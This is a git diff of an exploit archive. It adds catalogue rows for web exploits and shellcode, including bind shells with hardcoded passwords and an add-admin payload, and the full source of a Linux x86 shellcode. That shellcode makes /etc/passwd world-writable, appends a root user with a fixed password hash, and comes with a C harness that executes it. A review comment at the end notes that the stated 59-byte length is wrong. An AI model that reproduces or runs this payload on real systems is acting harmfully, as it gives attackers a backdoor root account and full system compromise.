 48303,exploits/php/webapps/48303.txt,"Django 3.0 - Cross-Site Request Forgery Token Bypass",2020-04-08,"Spad Security Group",webapps,php,
+48307,exploits/php/webapps/48307.txt,"WordPress Plugin Helpful 2.4.11 - SQL Injection",2020-04-10,"numan türle",webapps,php,
 48308,exploits/cgi/webapps/48308.py,"Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal",2020-04-10,"Basim Alabdullah",webapps,cgi,
 48310,exploits/hardware/webapps/48310.txt,"Huawei HG630 2 Router - Authentication Bypass",2020-04-13,"Eslam Medhat",webapps,hardware,
 48311,exploits/hardware/webapps/48311.py,"TVT NVMS 1000 - Directory Traversal",2020-04-13,"Mohin Paramasivam",webapps,hardware,
@@ -42647,7 +42693,9 @@ id,file,description,date,author,type,platform,port
 48340,exploits/ios/webapps/48340.txt,"Playable 9.18 iOS - Persistent Cross-Site Scripting",2020-04-17,Vulnerability-Lab,webapps,ios,
 48341,exploits/php/webapps/48341.txt,"TAO Open Source Assessment Platform 3.3.0 RC02 - HTML Injection",2020-04-17,Vulnerability-Lab,webapps,php,
 48345,exploits/php/webapps/48345.txt,"Centreon 19.10.5 - 'id' SQL Injection",2020-04-20,"Basim Alabdullah",webapps,php,
+48347,exploits/php/webapps/48347.txt,"Prestashop 1.7.6.4 - Cross-Site Request Forgery",2020-04-20,"Sivanesh Ashok",webapps,php,
 48348,exploits/php/webapps/48348.txt,"Fork CMS 5.8.0 - Persistent Cross-Site Scripting",2020-04-20,Vulnerability-Lab,webapps,php,
+48349,exploits/php/webapps/48349.py,"WordPress Plugin Simple File List 5.4 - Remote Code Execution",2020-04-20,coiffeur,webapps,php,
 48354,exploits/php/webapps/48354.txt,"CSZ CMS 1.2.7 - Persistent Cross-Site Scripting",2020-04-21,"Metin Yunus Kandemir",webapps,php,
 48356,exploits/php/webapps/48356.txt,"PMB 5.6 - 'logid' SQL Injection",2020-04-21,41-trk,webapps,php,
 48357,exploits/php/webapps/48357.txt,"CSZ CMS 1.2.7 - 'title' HTML Injection",2020-04-21,"Metin Yunus Kandemir",webapps,php,
@@ -42663,6 +42711,7 @@ id,file,description,date,author,type,platform,port
 48371,exploits/php/webapps/48371.txt,"Complaint Management System 4.2 - Authentication Bypass",2020-04-23,Besim,webapps,php,
 48372,exploits/php/webapps/48372.txt,"Complaint Management System 4.2 - Cross-Site Request Forgery (Delete User)",2020-04-23,Besim,webapps,php,
 48373,exploits/cgi/webapps/48373.rb,"Zen Load Balancer 3.10.1 - Directory Traversal (Metasploit)",2020-04-23,"Dhiraj Mishra",webapps,cgi,
+48374,exploits/php/webapps/48374.txt,"Library CMS Powerful Book Management System 2.2.0 - Session Fixation",2020-04-23,"Ismail Tasdelen",webapps,php,
 48375,exploits/ios/webapps/48375.txt,"Sky File 2.1.0 iOS - Directory Traversal",2020-04-23,Vulnerability-Lab,webapps,ios,
 48376,exploits/multiple/webapps/48376.txt,"EspoCRM 5.8.5 - Privilege Escalation",2020-04-24,Besim,webapps,multiple,
 48377,exploits/hardware/webapps/48377.txt,"Edimax EW-7438RPn 1.13 - Remote Code Execution",2020-04-24,Besim,webapps,hardware,
@@ -42805,7 +42854,7 @@ id,file,description,date,author,type,platform,port
 48567,exploits/php/webapps/48567.txt,"Virtual Airlines Manager 2.6.2 - 'airport' SQL Injection",2020-06-09,"Kostadin Tonev",webapps,php,
 48568,exploits/php/webapps/48568.py,"Bludit 3.9.12 - Directory Traversal",2020-06-09,"Luis Vacacas",webapps,php,
 48571,exploits/php/webapps/48571.txt,"Sistem Informasi Pengumuman Kelulusan Online 1.0 - Cross-Site Request Forgery (Add Admin)",2020-06-10,Extinction,webapps,php,
-48572,exploits/php/webapps/48572.txt,"Joomla! J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated)",2020-06-10,"Mehmet Kelepçe",webapps,php,
+48572,exploits/php/webapps/48572.txt,"Joomla! J2 Store 3.3.11 - 'filter_order_Dir' Authenticated SQL Injection",2020-06-10,"Mehmet Kelepçe",webapps,php,
 48574,exploits/php/webapps/48574.txt,"Virtual Airlines Manager 2.6.2 - 'id' SQL Injection",2020-06-10,Mosaaed,webapps,php,
 48580,exploits/multiple/webapps/48580.py,"SmarterMail 16 - Arbitrary File Upload",2020-06-12,vvhack.org,webapps,multiple,
 48581,exploits/multiple/webapps/48581.txt,"Avaya IP Office 11 - Password Disclosure",2020-06-12,hyp3rlinx,webapps,multiple,
@@ -42814,3 +42863,4 @@ id,file,description,date,author,type,platform,port
 48590,exploits/php/webapps/48590.py,"Gila CMS 1.11.8 - 'query' SQL Injection",2020-06-16,BillyV4,webapps,php,
 48593,exploits/php/webapps/48593.txt,"College-Management-System-Php 1.0 - Authentication Bypass",2020-06-17,"BLAY ABU SAFIAN",webapps,php,
 48595,exploits/multiple/webapps/48595.txt,"OpenCTI 3.3.1 - Directory Traversal",2020-06-17,"Raif Berkay Dincel",webapps,multiple,
+48605,exploits/php/webapps/48605.txt,"Beauty Parlour Management System 1.0 - Authentication Bypass",2020-06-18,"Prof. Kailas PATIL",webapps,php,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 4df2da0ca..5b4a7b3f8 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -1004,6 +1004,7 @@ id,file,description,date,author,type,platform
 47396,shellcodes/linux_x86/47396.c,"Linux/x86 - Bind TCP (port 43690) Null-Free Shellcode (53 Bytes)",2019-09-17,"Daniel Ortiz",shellcode,linux_x86
 47461,shellcodes/linux_x86/47461.c,"Linux/x86 - NOT + XOR-N + Random Encoded /bin/sh Shellcode (132 bytes)",2019-10-04,bolonobolo,shellcode,linux_x86
 47473,shellcodes/arm/47473.c,"Linux/ARM - Fork Bomb Shellcode (20 bytes)",2019-10-08,CJHackerz,shellcode,arm
+47481,shellcodes/linux/47481.c,"Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes)",2019-10-10,VL43CK,shellcode,linux
 47511,shellcodes/linux/47511.c,"Linux/x86 - adduser (User) to /etc/passwd Shellcode (74 bytes)",2019-10-16,bolonobolo,shellcode,linux
 47513,shellcodes/linux/47513.c,"Linux/x86 - execve /bin/sh Shellcode (25 bytes)",2019-10-16,bolonobolo,shellcode,linux
 47514,shellcodes/linux/47514.c,"Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)",2019-10-16,bolonobolo,shellcode,linux
@@ -1018,8 +1019,8 @@ id,file,description,date,author,type,platform
 48116,shellcodes/windows_x86/48116.c,"Windows/x86 - Null-Free WinExec Calc.exe Shellcode (195 bytes)",2020-02-24,boku,shellcode,windows_x86
 48229,shellcodes/windows/48229.txt,"Windows/x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes)",2020-03-18,boku,shellcode,windows
 48243,shellcodes/linux/48243.txt,"Linux\x86 - 'reboot' polymorphic Shellcode (26 bytes)",2020-03-23,Upayan,shellcode,linux
-48252,shellcodes/windows_x86-64/48252.txt,"Windows/x64 - WinExec Add-Admin Dynamic Null-Free Shellcode (210 Bytes)",2020-03-25,boku,shellcode,windows_x86-64
+48252,shellcodes/windows_x86-64/48252.txt,"Windows/x64 - WinExec Add-Admin (ROOT/I@mR00T$) Dynamic Null-Free Shellcode (210 Bytes)",2020-03-25,boku,shellcode,windows_x86-64
 48355,shellcodes/windows/48355.c,"Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes)",2020-04-21,boku,shellcode,windows
-48379,shellcodes/linux/48379.c,"Linux/x64 - Password Protected Bindshell + Null-free Shellcode (272 Bytes)",2020-04-24,boku,shellcode,linux
+48379,shellcodes/linux/48379.c,"Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes)",2020-04-24,boku,shellcode,linux
 48585,shellcodes/arm/48585.c,"Linux/ARM - execve /bin/dash Shellcode (32 bytes)",2020-06-15,"Anurag Srivastava",shellcode,arm
 48586,shellcodes/arm/48586.c,"Linux/ARM - Bind (0.0.0.0:1337/TCP) Shell (/bin/sh) + Null-Free Shellcode (100 bytes)",2020-06-15,"Anurag Srivastava",shellcode,arm
diff --git a/shellcodes/linux/47481.c b/shellcodes/linux/47481.c
new file mode 100644
index 000000000..b240a8e6a
--- /dev/null
+++ b/shellcodes/linux/47481.c
@@ -0,0 +1,105 @@
+# Exploit Title: Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes)
+# Date: 2019-10-05
+# Exploit Author: sagar.offsec (VL43CK)
+# Guided by: Touhid M.Shaikh
+# Designation: Security Consultant at SecureLayer7
+# Website: https://www.sagaroffsec.com
+# Tested on: Ubuntu i386 GNU/LINUX
+# Shellcode Length: 59
+
+----------------------(DESCRIPTION)----------------------------
+
+This shellcode will first change /etc/passwd permission to 777 and then
+add a user "vl43ck" in it with password "test" with root permissions.
+
+----------------------(SHELLCODE DUMP)-------------------------
+global _start
+
+section .text
+_start:
+
+ ;chmod 777 /etc/passwd
+
+ xor eax, eax
+ push eax
+
+ push 0x64777373
+ push 0x61702f63
+ push 0x74652f2f
+ xor ebx, ebp
+ lea ebx, [esp]
+
+ xor ecx, ecx
+ mov cx, 0x1ff
+
+ mov al, 0xf
+ int 0x80
+
+ ;add user in /etc/passwd
+
+ ;open /etc/passwd
+
+ xor eax, eax
+ mov al, 5
+ xor ecx, ecx
+ mov cx, 2001Q
+ int 0x80
+
+ ;write into /etc/passwd
+
+ xor ebx, ebx
+ mov ebx, eax
+
+ jmp short call_write
+write:
+ pop ecx
+
+ xor eax, eax
+ xor edx, edx
+ mov dx, 132
+ mov al, 4
+ int 0x80
+
+ ; close /etc/passwd
+
+ xor eax, eax
+ mov al, 6
+ int 0x80
+
+ ;exit gracefully
+
+ push eax
+ xor eax, eax
+ mov al, 1
+ xor ebx, ebx
+ pop ebx
+ int 0x80
+
+call_write:
+
+ call write
+ shellcode: db "vl43ck:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:0:0:vl43ck:/tmp:/bin/bash"
+
+
+----------------------(COMPILE)-------------------------
+
+gcc -m32 -fno-stack-protector -z execstack -o shellcode shellcode.c
+
+----------------------(C-Code)--------------------------
+
+#include
+#include
+
+unsigned char code[] = \
+"\x31\xc0\x50\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68\x2f\x2f\x65\x74\x31\xeb\x8d\x1c\x24\x31\xc9\x66\xb9\xff\x01\xb0\x0f\xcd\x80\x31\xc0\xb0\x05\x31\xc9\x66\xb9\x01\x04\xcd\x80\x31\xdb\x89\xc3\xeb\x1d\x59\x31\xc0\x31\xd2\x66\xba\x84\x00\xb0\x04\xcd\x80\x31\xc0\xb0\x06\xcd\x80\x50\x31\xc0\xb0\x01\x31\xdb\x5b\xcd\x80\xe8\xde\xff\xff\xff\x76\x6c\x34\x33\x63\x6b\x3a\x24\x36\x24\x62\x78\x77\x4a\x66\x7a\x6f\x72\x24\x4d\x55\x68\x55\x57\x4f\x30\x4d\x55\x67\x64\x6b\x57\x66\x50\x50\x45\x79\x64\x71\x67\x5a\x70\x6d\x2e\x59\x74\x50\x4d\x49\x2f\x67\x61\x4d\x34\x6c\x56\x71\x68\x50\x32\x31\x4c\x46\x4e\x57\x6d\x53\x4a\x38\x32\x31\x6b\x76\x4a\x6e\x49\x79\x6f\x4f\x44\x59\x74\x42\x68\x2e\x53\x46\x39\x61\x52\x37\x63\x69\x51\x42\x52\x43\x63\x77\x35\x62\x67\x6a\x58\x30\x3a\x30\x3a\x30\x3a\x76\x6c\x34\x33\x63\x6b\x3a\x2f\x74\x6d\x70\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68";
+
+main()
+{
+
+ printf("Shellcode Length: %d\n", strlen(code));
+
+ int (*ret)() = (int(*)())code;
+
+ ret();
+
+}
\ No newline at end of file
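Review bot: The `Shellcode Length: 59` header and the `(59 bytes)` title understate the payload, because `main()` measures it with `strlen(code)` and the array holds a `\x00` byte (the end of `\x66\xba\x84\x00`) after 59 bytes, well before the embedded passwd entry. Anyone sizing a detection signature or triaging this entry from the catalogue title gets the wrong figure, and `%d` does not match the `size_t` that `strlen` returns. The harness should report the whole array with `printf("Shellcode Length: %zu\n", sizeof(code) - 1);`, and the header, the title and the new `files_shellcodes.csv` row should carry that number. The two `#include` lines show no header names in this view, which may be an extraction artefact rather than part of the commit.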